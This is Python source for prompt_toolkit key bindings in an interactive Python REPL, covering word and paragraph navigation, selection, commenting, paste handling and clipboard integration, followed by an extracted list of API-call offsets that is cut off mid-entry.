@r.add_binding(Keys.Escape, 'p')
def previous_warning(event):
positions = warning_positions(event)
buffer = event.current_buffer
buffer._show_syntax_warning = True
if not positions or positions[0] >= buffer.cursor_position:
return
p = positions[0]
for pos in positions:
if pos >= buffer.cursor_position:
break
p = pos
event.current_buffer._show_syntax_warning = True
event.current_buffer.cursor_position = p
@r.add_binding(Keys.Escape, 'n')
def next_warning(event):
positions = warning_positions(event)
buffer = event.current_buffer
buffer._show_syntax_warning = True
if not positions or positions[-1] <= buffer.cursor_position:
return
p = positions[-1]
for pos in reversed(positions):
if pos <= buffer.cursor_position:
break
p = pos
event.current_buffer.cursor_position = p
# This can be removed once
# https://github.com/prompt-toolkit/python-prompt-toolkit/pull/857 is in a
# released version of prompt-toolkit.
ANSI_SEQUENCES['\x1b[1;9A'] = (Keys.Escape, Keys.Up)
ANSI_SEQUENCES['\x1b[1;9B'] = (Keys.Escape, Keys.Down)
@r.add_binding(Keys.Escape, Keys.Up)
def previous_history_search(event):
event.key_sequence[-1].accept_next = True
buffer = event.current_buffer
buffer.history_backward(count=event.arg, history_search=True)
@r.add_binding(Keys.Escape, 'P')
@r.add_binding(Keys.Escape, Keys.Down)
def forward_history_search(event):
event.key_sequence[-1].accept_next = True
buffer = event.current_buffer
buffer.history_forward(count=event.arg, history_search=True)
@r.add_binding(Keys.Escape, '<')
def beginning(event):
"""
Move to the beginning
"""
event.current_buffer.cursor_position = 0
@r.add_binding(Keys.Escape, '>')
def end(event):
"""
Move to the end
"""
event.current_buffer.cursor_position = len(event.current_buffer.text)
# Document.start_of_paragraph/end_of_paragraph don't treat multiple blank
# lines correctly.
# Gives the positions right before one or more blank lines
BLANK_LINES = re.compile(r'\S *(\n *\n)')
@r.add_binding(Keys.Escape, '}')
def forward_paragraph(event):
"""
Move forward one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in BLANK_LINES.finditer(text):
if m.start(0) > cursor_position:
event.current_buffer.cursor_position = m.start(1)+1
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, '{')
def backward_paragraph(event):
"""
Move back one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in BLANK_LINES.finditer(text[::-1]):
if m.start(0) > len(text) - cursor_position:
event.current_buffer.cursor_position = len(text) - m.end(1) + 1
return
event.current_buffer.cursor_position = 0
WORD = re.compile(r'([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)')
@r.add_binding(Keys.Escape, 'f')
@r.add_binding(Keys.Escape, Keys.Right)
def forward_word(event):
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
if m.end(0) > cursor_position:
event.current_buffer.cursor_position = m.end(0)
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'b')
@r.add_binding(Keys.Escape, Keys.Left)
def backward_word(event):
"""
Move back one paragraph of text
"""
text = event.current_buffer.text
cursor_position = event.current_buffer.cursor_position
for m in reversed(list(WORD.finditer(text))):
if m.start(0) < cursor_position:
event.current_buffer.cursor_position = m.start(0)
return
event.current_buffer.cursor_position = 0
@r.add_binding(Keys.Escape, 'd')
def kill_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = buffer.cursor_position
pos = None
for m in WORD.finditer(text):
if m.end(0) > cursor_position:
pos = m.end(0) - cursor_position
break
if pos:
deleted = buffer.delete(count=pos)
event.app.clipboard.set_text(deleted)
@r.add_binding(Keys.Escape, Keys.Backspace)
def backward_kill_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = buffer.cursor_position
for m in reversed(list(WORD.finditer(text))):
if m.start(0) < cursor_position:
pos = cursor_position - m.start(0)
break
else:
pos = buffer.cursor_position
if pos:
deleted = buffer.delete_before_cursor(count=pos)
event.app.clipboard.set_text(deleted)
def insert_text_ovewrite(buffer, data, move_cursor=True):
"""
Insert characters at cursor position.
:param fire_event: Fire `on_text_insert` event. This is mainly used to
trigger autocompletion while typing.
"""
# Original text & cursor position.
otext = buffer.text
ocpos = buffer.cursor_position
# Don't overwrite the newline itself. Just before the line ending,
# it should act like insert mode.
overwritten_text = otext[ocpos:ocpos + len(data)]
buffer.text = otext[:ocpos] + data + otext[ocpos + len(overwritten_text):]
if move_cursor:
buffer.cursor_position += len(data)
@r.add_binding(Keys.Escape, 'l')
def downcase_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
insert_text_ovewrite(buffer, word.lower())
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'u')
def upcase_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
insert_text_ovewrite(buffer, word.upper())
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, 'c')
def capitalize_word(event):
buffer = event.current_buffer
text = buffer.text
cursor_position = event.current_buffer.cursor_position
for m in WORD.finditer(text):
pos = m.end(0)
if pos > cursor_position:
word = buffer.document.text[cursor_position:pos]
# Don't use word.capitalize() because the first character could be
# - or _
for i, c in enumerate(word):
if c.isalnum():
word = word[:i] + c.capitalize() + word[i+1:].lower()
break
insert_text_ovewrite(buffer, word)
return
event.current_buffer.cursor_position = len(text)
@r.add_binding(Keys.Escape, Keys.ControlF)
def forward_sexp(event):
buffer = event.current_buffer
document = buffer.document
text = buffer.text
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
matching, mismatching = matching_parens(text)
for opening, closing in matching:
if opening.start == (row, col):
new_pos = document.translate_row_col_to_index(closing.end[0]-1, closing.end[1])
buffer.cursor_position = new_pos
return
event.app.output.bell()
@r.add_binding(Keys.Escape, Keys.ControlB)
def backward_sexp(event):
buffer = event.current_buffer
document = buffer.document
text = buffer.text
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
matching, mismatching = matching_parens(text)
for opening, closing in matching:
if closing.end == (row, col):
new_pos = document.translate_row_col_to_index(opening.start[0]-1, opening.start[1])
buffer.cursor_position = new_pos
return
event.app.output.bell()
@r.add_binding(Keys.Left)
def left_multiline(event):
"""
Left that wraps around in multiline.
"""
if event.current_buffer.cursor_position - event.arg >= 0:
event.current_buffer.cursor_position -= event.arg
if getattr(event.current_buffer.selection_state, "shift_arrow", False):
event.current_buffer.selection_state = None
@r.add_binding(Keys.Right)
def right_multiline(event):
"""
Right that wraps around in multiline.
"""
if event.current_buffer.cursor_position + event.arg <= len(event.current_buffer.text):
event.current_buffer.cursor_position += event.arg
if getattr(event.current_buffer.selection_state, "shift_arrow", False):
event.current_buffer.selection_state = None
@r.add_binding(Keys.ControlD)
def exit(event):
event.app.exit(exception=EOFError, style='class:exiting')
@r.add_binding(Keys.ControlC, filter=~is_searching)
def keyboard_interrupt(event):
event.app.exit(exception=KeyboardInterrupt, style='class:aborting')
is_returnable = Condition(
lambda: get_app().current_buffer.is_returnable)
@r.add_binding(Keys.Enter, filter=is_returnable)
def multiline_enter(event):
"""
When not in multiline, execute. When in multiline, try to
intelligently add a newline or execute.
"""
buffer = event.current_buffer
document = buffer.document
multiline = document_is_multiline_python(document)
text_after_cursor = document.text_after_cursor
text_before_cursor = document.text_before_cursor
text = buffer.text
# isspace doesn't respect vacuous truth
if (not text_after_cursor or text_after_cursor.isspace()) and text_before_cursor.replace(' ', '').endswith('\n'):
# If we are at the end of the buffer, accept unless we are in a
# docstring
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
if multiline and inside_string(text, row, col):
# We are inside a docstring
auto_newline(event.current_buffer)
else:
accept_line(event)
elif not multiline:
# Always accept a single valid line. Also occurs for unclosed single
# quoted strings (which will give a syntax error)
accept_line(event)
else:
auto_newline(event.current_buffer)
# Always accept the line if the previous key was Up
# Requires https://github.com/jonathanslenders/python-prompt-toolkit/pull/492.
# We don't need a parallel for down because down is already at the end of the
# prompt.
@r.add_binding(Keys.Enter, filter=is_returnable)
def accept_after_history_backward(event):
pks = event.previous_key_sequence
if pks and getattr(pks[-1], 'accept_next', False) and ((len(pks) == 1 and
pks[0].key == "up") or (len(pks) == 2 and pks[0].key == "escape"
and isinstance(pks[1].key, str) and pks[1].key in ['p', 'P', 'up',
'down'])):
accept_line(event)
else:
multiline_enter(event)
@r.add_binding(Keys.Escape, Keys.Enter)
@r.add_binding(Keys.Escape, Keys.ControlJ)
def insert_newline(event):
auto_newline(event.current_buffer)
@r.add_binding(Keys.ControlO)
def open_line(event):
event.current_buffer.newline(copy_margin=False)
event.current_buffer.cursor_left()
# M-[ a g is set to S-Enter in iTerm2 settings
Keys.ShiftEnter = "<Shift-Enter>"
ALL_KEYS.append('<Shift-Enter>')
ANSI_SEQUENCES['\x1b[ag'] = Keys.ShiftEnter
ANSI_SEQUENCES['\x1bOM'] = Keys.ShiftEnter
if prompt_toolkit_version[0] != '3':
r.add_binding(Keys.ShiftEnter)(accept_line)
@r.add_binding(Keys.Tab, filter=tab_should_insert_whitespace)
def indent(event):
"""
When tab should insert whitespace, do that instead of completion.
"""
# Text before cursor on the line must be whitespace because of the
# TabShouldInsertWhitespaceFilter.
before_cursor = event.app.current_buffer.document.current_line_before_cursor
event.app.current_buffer.insert_text(' '*(4 - len(before_cursor)%4))
LEADING_WHITESPACE = re.compile(r'( *)[^ ]?')
@r.add_binding(Keys.Escape, 'm')
def back_to_indentation(event):
"""
Move back to the beginning of the line, ignoring whitespace.
"""
current_line = event.app.current_buffer.document.current_line
before_cursor = event.app.current_buffer.document.current_line_before_cursor
indent = LEADING_WHITESPACE.search(current_line)
if indent:
event.app.current_buffer.cursor_position -= len(before_cursor) - indent.end(1)
@r.add_binding(Keys.Backspace, save_before=if_no_repeat)
def delete_char_or_unindent(event):
buffer = event.app.current_buffer
if buffer.document.current_line_before_cursor.isspace():
spaces = len(buffer.document.current_line_before_cursor)
# Delete up to the tab stop
buffer.delete_before_cursor(count=4 + spaces%-4)
else:
backward_delete_char(event)
# Reset the history search text
buffer.history_search_text = None
@r.add_binding(Keys.Escape, ' ')
def cycle_spacing(event):
"""
Based on emacs's cycle-spacing
On first call, remove all whitespace (if any) from around the cursor and
replace it with a single space.
On second call, remove all whitespace.
On third call, restore the original whitespace and cursor position.
"""
buffer = event.app.current_buffer
# Avoid issues when text grows or shrinks below, keeping the cursor
# position out of sync
cursor_position = buffer.cursor_position
buffer.cursor_position = 0
buffer.text, buffer.cursor_position = do_cycle_spacing(buffer.text, cursor_position)
def do_cycle_spacing(text, cursor_position, state=[]):
rstripped = text[:cursor_position].rstrip()
lstripped = text[cursor_position:].lstrip()
text_before_cursor = text[:cursor_position]
# The first element of state is the original text. The last element is the
# buffer text and cursor position as we last left them. If either of those
# have changed, reset. The state here is global, but that's fine, because
# we consider any change to be enough clear the state. The worst that
# happens here is that we resume when we shouldn't if things look exactly
# as they did where we left off.
# TODO: Use event.previous_key_sequence instead.
if state and state[-1] != (text, cursor_position):
state.clear()
if len(state) == 0:
# Replace all whitespace at the cursor (if any) with a single space.
state.append((text, cursor_position))
cursor_position -= len(text_before_cursor) - len(rstripped) -1
text = rstripped + ' ' + lstripped
state.append((text, cursor_position))
elif len(state) == 2:
# Exactly one space at the cursor. Remove it.
cursor_position -= 1
text = rstripped + lstripped
state.append((text, cursor_position))
elif len(state) == 3:
# Restore original text and cursor position
text, cursor_position = state[0]
state.clear()
if cursor_position < 0:
cursor_position = 0
if cursor_position > len(text):
cursor_position = len(text)
return text, cursor_position
@r.add_binding(Keys.ControlX, Keys.ControlO)
def delete_blank_lines(event):
"""
On blank line, delete all surrounding blank lines, leaving just one.
On isolated blank line, delete that one.
On nonblank line, delete any immediately following blank lines.
"""
buffer = event.app.current_buffer
document = buffer.document
lines_up_to_current = document.lines[:document.cursor_position_row+1]
lines_after_current = document.lines[document.cursor_position_row+1:]
blank_lines_before = 0
for line in lines_up_to_current[::-1]:
if not line.strip():
blank_lines_before += 1
else:
break
blank_lines_after = 0
for line in lines_after_current:
if not line.strip():
blank_lines_after += 1
else:
break
if not blank_lines_before:
stripped_before = lines_up_to_current
else:
stripped_before = lines_up_to_current[:-blank_lines_before]
stripped_after = lines_after_current[blank_lines_after:]
# XXX: Emacs always keeps a newline at the end of the file, but I don't
# think it matters here.
if (not blank_lines_before and blank_lines_after) or blank_lines_before + blank_lines_after == 1:
new_text = '\n'.join(stripped_before + stripped_after)
elif blank_lines_before + blank_lines_after == 0:
return
else:
buffer.cursor_up(max(blank_lines_before-1, 0))
new_text = '\n'.join(stripped_before + [''] + stripped_after)
# Even though we do auto_up, it can be out of bounds from trailing
# whitespace
buffer.cursor_position = min(buffer.cursor_position, len(new_text))
buffer.text = new_text
@r.add_binding(Keys.ControlX, Keys.ControlT)
def transpose_lines(event):
buffer = event.current_buffer
document = buffer.document
row = document.cursor_position_row
new_lines = document.lines[:]
if len(new_lines) == 1:
new_lines.append('')
if row == 0:
buffer.cursor_down()
row += 1
if row == len(new_lines) - 1:
new_lines.append('')
new_lines[row], new_lines[row-1] = new_lines[row-1], new_lines[row]
buffer.text = '\n'.join(new_lines)
buffer.cursor_down()
beginning_of_line(event)
# Selection stuff
@r.add_binding(Keys.ShiftLeft)
def select_left(event):
buffer = event.current_buffer
if buffer.document.text_before_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
buffer.cursor_position -= event.arg
@r.add_binding(Keys.ShiftRight)
def select_right(event):
buffer = event.current_buffer
if buffer.document.text_after_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
buffer.cursor_position += event.arg
@r.add_binding(Keys.Up)
def auto_up(event):
buffer = event.current_buffer
count = event.arg
if buffer.document.cursor_position_row > 0:
buffer.cursor_up(count=count)
elif not buffer.selection_state:
event.key_sequence[-1].accept_next = True
buffer.history_backward(count=count)
if getattr(buffer.selection_state, "shift_arrow", False):
buffer.selection_state = None
@r.add_binding(Keys.Down)
def auto_down(event):
buffer = event.current_buffer
count = event.arg
if buffer.document.cursor_position_row < buffer.document.line_count - 1:
buffer.cursor_down(count=count)
elif not buffer.selection_state:
buffer.history_forward(count=count)
if getattr(buffer.selection_state, "shift_arrow", False):
buffer.selection_state = None
@r.add_binding(Keys.ShiftUp)
def select_line_up(event):
buffer = event.current_buffer
if buffer.document.text_before_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
up_position = buffer.document.get_cursor_up_position()
buffer.cursor_position += up_position
if not up_position:
buffer.cursor_position = 0
@r.add_binding(Keys.ShiftDown)
def select_line_down(event):
buffer = event.current_buffer
if buffer.document.text_after_cursor:
if not buffer.selection_state:
buffer.start_selection()
buffer.selection_state.shift_arrow = True
down_position = buffer.document.get_cursor_down_position()
buffer.cursor_position += down_position
if not down_position:
buffer.cursor_position = len(buffer.document.text)
# The default doesn't toggle correctly
@r.add_binding(Keys.ControlSpace)
def toggle_selection(event):
buffer = event.current_buffer
if buffer.selection_state:
buffer.selection_state = None
else:
buffer.start_selection()
@r.add_binding(Keys.ControlX, 'h')
def select_all(event):
buffer = event.current_buffer
buffer.selection_state = SelectionState(len(buffer.document.text))
buffer.cursor_position = 0
@r.add_binding(Keys.Delete, filter=HasSelection())
@r.add_binding(Keys.Backspace, filter=HasSelection())
def delete_selection(event):
event.current_buffer.cut_selection()
@r.add_binding(Keys.Any, filter=HasSelection())
def self_insert_and_clear_selection(event):
event.current_buffer.cut_selection()
self_insert(event)
@r.add_binding(Keys.ControlK, filter=HasSelection())
@r.add_binding(Keys.ControlU, filter=HasSelection())
def kill_selection(event):
data = event.current_buffer.cut_selection()
event.app.clipboard.set_data(data)
def system_copy(text):
if "Linux" in platform.platform():
copy_command = ['xclip', '-selection', 'c']
else:
copy_command = ['pbcopy']
try:
# In Python 3.6 we can do this:
# run(copy_command, input=text, encoding='utf-8', check=True)
subprocess.run(copy_command, input=text.encode('utf-8'), check=True)
except FileNotFoundError:
print("Error: could not find", copy_command[0], file=sys.stderr)
except subprocess.CalledProcessError as e:
print(copy_command[0], "error:", e, file=sys.stderr)
def system_paste():
if "Linux" in platform.platform():
paste_command = ['xsel', '-b']
else:
paste_command = ['pbpaste']
try:
# In Python 3.6 we can do this:
# run(paste_command, input=text, encoding='utf-8')
p = subprocess.run(paste_command, stdout=subprocess.PIPE, check=True)
except FileNotFoundError:
print("Error: could not find", paste_command[0], file=sys.stderr)
except subprocess.CalledProcessError as e:
print(paste_command[0], "error:", e, file=sys.stderr)
return p.stdout.decode('utf-8')
@r.add_binding(Keys.ControlX, Keys.ControlW)
def copy_to_clipboard(event):
if event.current_buffer.document.selection:
from_, to = event.current_buffer.document.selection_range()
run_in_terminal(lambda:system_copy(event.current_buffer.document.text[from_:to + 1]))
@r.add_binding(Keys.ControlX, Keys.ControlY)
def paste_from_clipboard(event):
paste_text_future = run_in_terminal(system_paste)
event.current_buffer.cut_selection()
paste_text_future.add_done_callback(lambda future:\
event.current_buffer.paste_clipboard_data(ClipboardData(future.result())))
# M-[ a b is set to C-S-/ (C-?) in iTerm2 settings
Keys.ControlQuestionmark = "<C-?>"
ALL_KEYS.append("<C-?>")
ANSI_SEQUENCES['\x1b[ab'] = Keys.ControlQuestionmark
Keys.ControlSlash = "<C-/>"
ALL_KEYS.append("<C-/>")
ANSI_SEQUENCES['\x1b"5/'] = Keys.ControlSlash
# This won't work until
# https://github.com/jonathanslenders/python-prompt-toolkit/pull/484 is
# merged.
if prompt_toolkit_version[0] != '3':
@r.add_binding(Keys.ControlQuestionmark, save_before=lambda e: False)
def redo(event):
event.current_buffer.redo()
@r.add_binding(Keys.ControlSlash, save_before=lambda e: False)
def undo(event):
event.current_buffer.undo()
# Need to escape all spaces here because of verbose (x) option below
ps1_prompts = [r'>>>\ '] + [re.escape(i) + r'\[\d+\]:\ ' for i, j in emoji + [emoji_pudb]] + [r'In\ \[\d+\]:\ ']
ps2_prompts = [r'\ *\.\.\.:\ ?', r'\.\.\.\ ?', '\N{CLAPPING HANDS SIGN}+\\ ?⎢\\ ?']
PS1_PROMPTS_RE = re.compile('|'.join(ps1_prompts))
PS2_PROMPTS_RE = re.compile('|'.join(ps2_prompts))
PROMPTED_TEXT_RE = re.compile(r'''(?x) # Multiline and verbose
(?P<prompt>
(?P<ps1prompt>{PS1_PROMPTS_RE.pattern}) # Match prompts at the front
| (?P<ps2prompt>{PS2_PROMPTS_RE.pattern}))? # of the line.
(?P<noprompt>(?(prompt)\r|))? # If the prompt is not
# matched, this is a special
# marker group that will match
# the empty string.
# Otherwise it will not
# match (because all \r's
# have been stripped from
# the string).
(?P<line>.*)\n # The actual line.
'''.format(PS1_PROMPTS_RE=PS1_PROMPTS_RE, PS2_PROMPTS_RE=PS2_PROMPTS_RE))
def prompt_repl(match):
r"""
repl function for re.sub for clearing prompts
Replaces PS1 prompts with \r and removes PS2 prompts.
"""
# TODO: Remove the lines with no prompt
if match.group('ps1prompt') is not None:
return '\r' + match.group('line') + '\n'
elif match.group('ps2prompt') is not None:
return match.group('line') + '\n'
return ''
def split_prompts(text, indent=''):
r"""
Takes text copied from mypython, Python, or IPython session and returns a
list of inputs
Outputs are stripped. If no prompts are found the text is left alone.
The resulting text is indented by indent, except for the first line.
It is assumed that the text contains no carriage returns (\r).
Trailing whitespace and newlines is stripped from the outputs.
Example:
>>> split_prompts('''
... In [1]: a = 1
...
... In [2]: a
... Out[2]: 1
...
... In [3]: def test():
... ...: pass
... ...:
... ''')
['a = 1', 'a', 'def test():\n pass']
"""
from .mypython import validate_text
text = textwrap.dedent(text).strip() + '\n'
text = textwrap.dedent(PROMPTED_TEXT_RE.sub(prompt_repl, text)).lstrip()
lines = text.split('\r')
# Make sure multilines end in two newlines
for i, line in enumerate(lines):
try:
validate_text(line)
except SyntaxError:
# If there is a syntax error, we can't use the CMD_QUEUE (it
# breaks things).
lines = ['\n'.join(lines)]
break
if '\n' in line.rstrip():
lines[i] += '\n'
lines[0] = textwrap.indent(lines[0], indent,
# Don't indent the first line, it's already indented
lambda line, _x=[]: bool(_x or _x.append(1)))
for i in range(1, len(lines)):
lines[i] = textwrap.indent(lines[i], indent)
# Extraneous newlines at the end will be stripped by the prompt anyway.
# This just makes this function easier to test.
lines = [i.rstrip() for i in lines]
return lines
@r.add_binding(Keys.BracketedPaste)
def bracketed_paste(event):
from .mypython import CMD_QUEUE
data = event.data
buffer = event.current_buffer
# Be sure to use \n as line ending.
# This part is the same as the default binding
# Some terminals (Like iTerm2) seem to paste \r\n line endings in a
# bracketed paste. See: https://github.com/ipython/ipython/issues/9737
data = data.replace('\r\n', '\n')
data = data.replace('\r', '\n')
# Replace tabs with four spaces (C-x C-y will still paste the text exactly)
data = data.replace('\t', ' ')
# Strip prompts off pasted text
document = buffer.document
row, col = document.translate_index_to_position(buffer.cursor_position)
row += 1
if not inside_string(event.current_buffer.text, row, col):
indent = LEADING_WHITESPACE.match(document.current_line_before_cursor)
current_line_indent = indent.group(1) if indent else ''
if PS1_PROMPTS_RE.match(data.strip()) or PS2_PROMPTS_RE.match(data.strip()):
lines = split_prompts(data, current_line_indent)
else:
lines = [textwrap.indent(data, current_line_indent,
# Don't indent the first line, it's already indented
lambda line, _x=[]: bool(_x or _x.append(1)))]
else:
lines = [data]
event.current_buffer.insert_text(lines[0])
for text in lines[1:]:
# TODO: Send last chunk as bracketed paste, so it can be edited
CMD_QUEUE.append(text)
if CMD_QUEUE:
accept_line(event)
@r.add_binding(Keys.Escape, ';')
def comment(event):
buffer = event.current_buffer
document = buffer.document
cursor_line, cursor_col = document.translate_index_to_position(document.cursor_position)
if document.selection:
from_, to = document.selection_range()
start_line, start_col = document.translate_index_to_position(from_)
end_line, end_col = document.translate_index_to_position(to - 1)
end_line += 1
else:
start_line = cursor_line
end_line = start_line + 1
# Get the indentation for the comment delimiters
min_indent = float('inf')
for line in document.lines[start_line:end_line]:
if not line.strip():
continue
indent = LEADING_WHITESPACE.search(line)
if indent:
min_indent = min(min_indent, len(indent.group(1)))
else:
min_indent = 0
if min_indent == 0:
break
if min_indent == float('inf'):
min_indent = 0
uncomment = (all(not line.strip() or line[min_indent] == '#' for line in
document.lines[start_line:end_line])
and ''.join(document.lines[start_line:end_line]).strip())
lines = []
for i, line in enumerate(document.lines):
if start_line <= i < end_line:
if uncomment:
lines.append(line[:min_indent] + line[min_indent+2:])
else:
lines.append(line[:min_indent] + '# ' + line[min_indent:])
else:
lines.append(line)
new_text = '\n'.join(lines)
# TODO: Set the cursor position correctly
n_changed = 2*(cursor_line - start_line + 1)
if cursor_line >= end_line - 1:
n_changed -= 2
if uncomment:
buffer.cursor_position -= n_changed
buffer.text = new_text
else:
buffer.text = new_text
buffer.cursor_position += n_changed
@r.add_binding(Keys.ControlX, Keys.ControlE)
def open_in_editor(event):
event.current_buffer.open_in_editor(event.app)
@r.add_binding(Keys.ControlX, Keys.ControlS)
@r.add_binding(Keys.ControlX, Keys.ControlC)
def noop(event):
pass
| [
"prompt_toolkit.key_binding.bindings.named_commands.backward_delete_char",
"re.escape",
"re.compile",
"prompt_toolkit.key_binding.bindings.emacs.load_emacs_search_bindings",
"prompt_toolkit.key_binding.bindings.page_navigation.load_emacs_page_navigation_bindings",
"prompt_toolkit.application.current.get_app",
"textwrap.dedent",
"prompt_toolkit.key_binding.bindings.cpr.load_cpr_bindings",
"prompt_toolkit.keys.ALL_KEYS.append",
"textwrap.indent",
"prompt_toolkit.application.run_in_terminal",
"platform.platform",
"subprocess.run",
"prompt_toolkit.key_binding.KeyBindings",
"prompt_toolkit.key_binding.bindings.named_commands.beginning_of_line",
"prompt_toolkit.key_binding.bindings.named_commands.accept_line",
"prompt_toolkit.key_binding.bindings.mouse.load_mouse_bindings",
"prompt_toolkit.key_binding.bindings.named_commands.self_insert",
"prompt_toolkit.key_binding.bindings.basic.load_basic_bindings",
"prompt_toolkit.key_binding.bindings.emacs.load_emacs_bindings",
"prompt_toolkit.filters.HasSelection"
] | [((1867, 1880), 'prompt_toolkit.key_binding.KeyBindings', 'KeyBindings', ([], {}), '()\n', (1878, 1880), False, 'from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings\n'), ((4468, 4497), 're.compile', 're.compile', (['"""\\\\S *(\\\\n *\\\\n)"""'], {}), "('\\\\S *(\\\\n *\\\\n)')\n", (4478, 4497), False, 'import re\n'), ((5391, 5447), 're.compile', 're.compile', (['"""([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)"""'], {}), "('([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)')\n", (5401, 5447), False, 'import re\n'), ((13992, 14024), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<Shift-Enter>"""'], {}), "('<Shift-Enter>')\n", (14007, 14024), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((14652, 14675), 're.compile', 're.compile', (['"""( *)[^ ]?"""'], {}), "('( *)[^ ]?')\n", (14662, 14675), False, 'import re\n'), ((25290, 25314), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<C-?>"""'], {}), "('<C-?>')\n", (25305, 25314), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((25397, 25421), 'prompt_toolkit.keys.ALL_KEYS.append', 'ALL_KEYS.append', (['"""<C-/>"""'], {}), "('<C-/>')\n", (25412, 25421), False, 'from prompt_toolkit.keys import Keys, ALL_KEYS\n'), ((20051, 20075), 'prompt_toolkit.key_binding.bindings.named_commands.beginning_of_line', 'beginning_of_line', (['event'], {}), '(event)\n', (20068, 20075), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((23213, 23231), 'prompt_toolkit.key_binding.bindings.named_commands.self_insert', 'self_insert', (['event'], {}), '(event)\n', (23224, 23231), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((24992, 25021), 'prompt_toolkit.application.run_in_terminal', 'run_in_terminal', (['system_paste'], {}), '(system_paste)\n', (25007, 25021), False, 'from prompt_toolkit.application import run_in_terminal\n'), ((13556, 13574), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (13567, 13574), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((15494, 15521), 'prompt_toolkit.key_binding.bindings.named_commands.backward_delete_char', 'backward_delete_char', (['event'], {}), '(event)\n', (15514, 15521), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((22935, 22949), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (22947, 22949), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((22989, 23003), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23001, 23003), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23108, 23122), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23120, 23122), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23270, 23284), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23282, 23284), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23323, 23337), 'prompt_toolkit.filters.HasSelection', 'HasSelection', ([], {}), '()\n', (23335, 23337), False, 'from prompt_toolkit.filters import Condition, HasSelection, is_searching\n'), ((23495, 23514), 'platform.platform', 'platform.platform', ([], {}), '()\n', (23512, 23514), False, 'import platform\n'), ((24059, 24078), 'platform.platform', 'platform.platform', ([], {}), '()\n', (24076, 24078), False, 'import platform\n'), ((24286, 24351), 'subprocess.run', 'subprocess.run', (['paste_command'], {'stdout': 'subprocess.PIPE', 'check': '(True)'}), '(paste_command, stdout=subprocess.PIPE, check=True)\n', (24300, 24351), False, 'import subprocess\n'), ((29068, 29101), 'textwrap.indent', 'textwrap.indent', (['lines[i]', 'indent'], {}), '(lines[i], indent)\n', (29083, 29101), False, 'import textwrap\n'), ((30835, 30853), 'prompt_toolkit.key_binding.bindings.named_commands.accept_line', 'accept_line', (['event'], {}), '(event)\n', (30846, 30853), False, 'from prompt_toolkit.key_binding.bindings.named_commands import accept_line, self_insert, backward_delete_char, beginning_of_line\n'), ((1601, 1622), 'prompt_toolkit.key_binding.bindings.basic.load_basic_bindings', 'load_basic_bindings', ([], {}), '()\n', (1620, 1622), False, 'from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings\n'), ((1633, 1654), 'prompt_toolkit.key_binding.bindings.emacs.load_emacs_bindings', 'load_emacs_bindings', ([], {}), '()\n', (1652, 1654), False, 'from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings\n'), ((1664, 1692), 'prompt_toolkit.key_binding.bindings.emacs.load_emacs_search_bindings', 'load_emacs_search_bindings', ([], {}), '()\n', (1690, 1692), False, 'from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings\n'), ((1702, 1739), 'prompt_toolkit.key_binding.bindings.page_navigation.load_emacs_page_navigation_bindings', 'load_emacs_page_navigation_bindings', ([], {}), '()\n', (1737, 1739), False, 'from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings\n'), ((1750, 1771), 'prompt_toolkit.key_binding.bindings.mouse.load_mouse_bindings', 'load_mouse_bindings', ([], {}), '()\n', (1769, 1771), False, 'from 